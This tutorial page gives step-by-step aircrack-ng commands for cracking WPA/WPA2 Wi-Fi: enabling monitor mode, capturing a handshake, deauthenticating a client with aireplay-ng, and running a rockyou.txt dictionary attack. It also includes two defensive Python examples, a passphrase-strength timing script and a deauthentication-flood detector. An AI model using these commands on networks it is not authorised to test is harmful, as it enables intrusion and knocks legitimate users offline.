How to Crack a Wifi

Last updated 3 months ago

This tutorial demonstrates how to crack a Wi-Fi network using a wireless adapter in monitor mode and the aircrack-ng suite. Created by @bst04.

Disclaimer: This guide is intended for educational purposes only. Unauthorized access to any network is illegal and unethical. Use this knowledge responsibly and ethically.


📌 Basic Information

1. Network Protocols

Understanding the protocols used in Wi-Fi networks is essential:

  • WEP (Wired Equivalent Privacy): An obsolete protocol with significant security flaws.

  • WPA (Wi-Fi Protected Access): Improved security over WEP but still vulnerable to weak passwords.

  • WPA2: More secure than WPA, using AES encryption, typically with a pre-shared key (PSK). Still susceptible to brute-force attacks if weak passwords are used.

  • WPA3: The latest standard with enhanced protection against brute-force attacks. However, not all networks have adopted it yet.

2. Encryption and Authentication Methods

  • TKIP (Temporal Key Integrity Protocol): Legacy encryption with dynamic keys per packet; vulnerable to brute-force attacks.

  • AES (Advanced Encryption Standard): A secure symmetric encryption method widely used in modern Wi-Fi networks.

  • PSK (Pre-Shared Key): Commonly used on home networks, where a single shared passphrase authenticates every client. Vulnerable to brute-force attacks if the passphrase is weak.
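As an added example (not from the original tutorial), the following Python derives the WPA/WPA2 pre-shared key exactly as 802.11i specifies, PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, checks it against the IEEE test vector, and times it. The point for a defender is that the SSID is public, so the passphrase is the only secret, and the 4096-iteration cost per guess is what makes a long random passphrase impractical to exhaust while a dictionary word is not. The candidate strings and the 14-million-entry wordlist size used for the timing illustration are assumptions.

```python
import hashlib
import time

# IEEE 802.11i Annex H.4.1 test vector: passphrase "password", SSID "IEEE".
IEEE_VECTOR_PSK = bytes.fromhex(
    "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"
)


def derive_psk(passphrase: str, ssid: str) -> bytes:
    """Derive the 256-bit WPA/WPA2 PSK from a passphrase as 802.11i specifies:
    PBKDF2-HMAC-SHA1, salt = SSID, 4096 iterations, 32-byte output.
    The SSID is broadcast in every beacon, so the passphrase is the only secret."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases must be 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, dklen=32)


def guesses_per_second(ssid: str, samples: int = 20) -> float:
    """Time the derivation on this CPU: this is the cost a dictionary attack
    such as Step 5 pays for every candidate (the candidates here are made up)."""
    start = time.perf_counter()
    for i in range(samples):
        derive_psk(f"candidate{i:04d}", ssid)
    return samples / (time.perf_counter() - start)


def days_to_exhaust(space_size: int, rate: float) -> float:
    """Days needed to try every candidate in a space at `rate` guesses per second."""
    return space_size / rate / 86400


if __name__ == "__main__":
    rate = guesses_per_second("IEEE")
    print(f"about {rate:.0f} PBKDF2 derivations per second on one CPU core")
    # Assumed sizes: a 14-million-entry wordlist (roughly rockyou.txt) versus
    # a random 12-character passphrase drawn from a 36-symbol alphabet.
    print(f"wordlist of 14e6 entries: {days_to_exhaust(14_000_000, rate):.2f} days")
    print(f"random 36^12 space:       {days_to_exhaust(36 ** 12, rate):.3g} days")
```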


📋 Requirements

Before proceeding, ensure you have the following:

  1. Aircrack-ng Suite: Installed on your system.

  2. Wireless Adapter Compatible with Monitor Mode: Ensure your adapter supports packet injection and monitor mode.


🚀 Step-by-Step Process

Step 1: Install Aircrack-ng

If you're not using Kali Linux, you'll need to install the aircrack-ng suite. Run the following commands in your terminal:

sudo apt-get update
sudo apt-get install aircrack-ng

Note: If you're using Kali Linux, aircrack-ng is pre-installed.


Step 2: Enable Monitor Mode

To capture packets from the target network, your wireless adapter must be in monitor mode. First, identify your wireless interface by running:

ip addr

Once you know the interface name (e.g., wlan0), enable monitor mode:

sudo airmon-ng start [interface]

Example: If your interface is wlan0, run:

sudo airmon-ng start wlan0

This will create a new interface, typically named wlan0mon.


Step 3: Scan for Wi-Fi Networks

Use airodump-ng to scan for nearby Wi-Fi networks:

sudo airodump-ng [interface + mon]

Example: If your monitor mode interface is wlan0mon, run:

sudo airodump-ng wlan0mon

This will display a list of available networks, including their BSSID (MAC address), channel, and encryption type. Note down the details of the target network.


Step 4: Capture the Handshake

Focus on the target network by capturing its handshake. Use the following command:

sudo airodump-ng -c [channel] --bssid [BSSID] -w [output file] [interface + mon]

Example: If the target network is on channel 6 with BSSID 00:11:22:33:44:55, run:

sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon

Leave this process running until the handshake is captured. airodump-ng writes the captured frames to the output file (capture-01.cap), which you can inspect to verify the capture.

To speed up the handshake capture, deauthenticate connected clients using aireplay-ng:

sudo aireplay-ng -0 5 -a [BSSID] -c [STATION] [interface + mon]

Example: If the station (connected device) is 66:77:88:99:AA:BB, run:

sudo aireplay-ng -0 5 -a 00:11:22:33:44:55 -c 66:77:88:99:AA:BB wlan0mon

Step 5: Crack the Password

Once you have the handshake file, use aircrack-ng to attempt to crack the password. Provide a wordlist of candidate passphrases to test against the handshake:

sudo aircrack-ng -w [wordlist file] [handshake file]

Example: If your wordlist is rockyou.txt and the handshake file is capture-01.cap, run:

sudo aircrack-ng -w rockyou.txt capture-01.cap

The tool will try each password in the wordlist until it finds a match or exhausts the list.
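As an added example rather than part of the original guide, here is a defender's counterpart to the procedure above, specifically Step 4: a small Python detector that scans 802.11 management frames for the deauthentication bursts that aireplay-ng -0 produces, the kind of signal a wireless IDS alerts on. The BSSID and station MACs reuse the tutorial's placeholder values and the frame records are constructed, not captured. Networks that enable 802.11w Protected Management Frames (mandatory in WPA3) reject spoofed deauthentication frames outright.

```python
from collections import defaultdict, deque
from dataclasses import dataclass

MGMT_TYPE = 0          # 802.11 frame type 0 = management
DEAUTH_SUBTYPE = 0x0C  # management subtype 12 = deauthentication


@dataclass(frozen=True)
class Frame:
    ts: float        # capture timestamp, seconds
    ftype: int       # 802.11 frame type
    subtype: int     # 802.11 frame subtype
    addr1: str       # receiver address
    addr2: str       # transmitter address
    addr3: str       # BSSID
    reason: int = 0  # reason code (deauth/disassoc only)


def detect_deauth_bursts(frames, window=1.0, threshold=10):
    """Return one alert (bssid, receiver, count, ts) per (BSSID, receiver)
    pair that sees more than `threshold` deauthentication frames inside any
    `window`-second span. A real AP deauthenticates a client rarely;
    aireplay-ng -0 sends them in tight bursts, which is the tell."""
    recent = defaultdict(deque)
    alerts, fired = [], set()
    for f in sorted(frames, key=lambda x: x.ts):
        if f.ftype != MGMT_TYPE or f.subtype != DEAUTH_SUBTYPE:
            continue
        key = (f.addr3, f.addr1)
        q = recent[key]
        q.append(f.ts)
        while f.ts - q[0] > window:   # drop frames older than the window
            q.popleft()
        if len(q) > threshold and key not in fired:
            fired.add(key)
            alerts.append((f.addr3, f.addr1, len(q), f.ts))
    return alerts


def sample_capture():
    """Constructed frames (not a real capture): a beacon, one legitimate
    deauth, then 40 spoofed deauths in 0.4 s addressed to the station."""
    ap, sta = "00:11:22:33:44:55", "66:77:88:99:aa:bb"
    frames = [Frame(0.0, MGMT_TYPE, 8, "ff:ff:ff:ff:ff:ff", ap, ap),
              Frame(5.0, MGMT_TYPE, DEAUTH_SUBTYPE, sta, ap, ap, 3)]
    frames += [Frame(100.0 + i * 0.01, MGMT_TYPE, DEAUTH_SUBTYPE, sta, ap, ap, 7)
               for i in range(40)]
    return frames


if __name__ == "__main__":
    for bssid, victim, n, ts in detect_deauth_bursts(sample_capture()):
        print(f"t={ts:.2f}s deauth flood: {n} frames from {bssid} to {victim}")
```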


🛠 Tips and Best Practices

  1. Use a Good Wordlist: Cracking tools like hashcat ship with sample wordlists, and online resources provide more comprehensive ones.

  2. Optimize Your Wireless Adapter: Ensure your adapter is compatible with packet injection and has good signal reception.

  3. Be Patient: Cracking strong passwords may take time, depending on the complexity and length of the passphrase.


Conclusion

By following these steps, you can learn how to crack a Wi-Fi network using aircrack-ng. Remember to use this knowledge responsibly and within legal boundaries. Happy learning!